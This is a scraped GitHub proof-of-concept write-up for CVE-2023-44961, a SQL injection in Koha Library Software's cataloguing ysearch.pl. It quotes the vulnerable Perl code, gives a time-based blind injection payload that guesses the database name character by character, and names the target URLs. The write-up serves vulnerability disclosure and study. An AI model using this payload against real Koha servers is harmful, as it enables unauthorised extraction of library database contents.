Headline
CVE-2023-44961: GitHub - ggb0n/CVE-2023-44961: PoC for CVE-2023-44961
SQL Injection vulnerability in Koha Library Software 23.0.5.04 and before allows a remote attacker to obtain sensitive information via the intranet/cgi bin/cataloging/ysearch.pl. component.
CVE-2023-44961
PoC for CVE-2023-44961
Description
This is a SQL Injection vulnerability in Koha Library Software v.23.0.5.04 and before version which allows a remote attacker to obtain arbitrary data from the koha sql server.
Analysis
This vulnerability appears in the intranet/cgi bin/cataloging/ysearch.pl file of the intranet interface:
… my $query = $input->param(‘term’); my $table = $input->param(‘table’); my $field = $input->param(‘field’);
Prevent from disclosing data
die() unless ($table eq “biblioitems”);
…
my $dbh = C4::Context->dbh; my $sql = qq(SELECT distinct $field FROM $table WHERE $field LIKE ? OR $field LIKE ? or $field LIKE ?); $sql .= qq( ORDER BY $field); my $sth = $dbh->prepare($sql); $sth->execute("$query%", "% $query%", “%-$query%”); …
When concatenating SQL statements with the $sql variable in the code, keyword filtering was not performed. We can achieve time-based SQL blind injection by injecting the following payload:
$field = 1 and if((substr(database(),1,1)='k'), sleep(1), sleep(0))
The sql command after concatenation is:
SELECT distinct 1 and IF((SUBSTR(database(),1,1)=’k’),sleep(1),sleep(0)) FROM biblioitems WHERE 1 and IF((SUBSTR(database(),1,1)=’k’),sleep(1),sleep(0)) LIKE “” OR 1 and IF((SUBSTR(database(),1,1)=’k’),sleep(1),sleep(0)) LIKE “” or 1 and IF((SUBSTR(database(),1,1)=’k’),sleep(1),sleep(0)) LIKE “” ORDER BY 1 and IF((SUBSTR(database(),1,1)=’k’),sleep(1),sleep(0))
Since SELECT distinct $field FROM $table WHERE $field LIKE ? OR $field LIKE ? or $field LIKE ? is used to return the values of all the $field fields in the $table that meet one of the three LIKE conditions, it will traverse each row of data in the $table.
Therefore, if you want to reduce the sleep time, set the sleep time to 1/n (n represents the number of rows of data in the $table), that is, sleep (1/n).
PoC
To trigger the SQL injection vulnerability here, first ensure that there is data in the biblioitems table. We can add data through the following URL:
http://koha_ip:intranet_port/cgi-bin/koha/cataloguing/addbiblio.pl
I have added a piece of data here:
Test our SQL statements on the command line:
It can be seen that in the biblioitems table, with one piece of data, the sleep is set to 1 second, and the actual sleep time is 3 seconds.
Following this approach, a PoC can be constructed for testing:
Access the following url to trigger:
http://koha_ip:intranet_port/cgi-bin/koha/cataloguing/ysearch.pl
As shown in the figure my database name is koha_mykoha.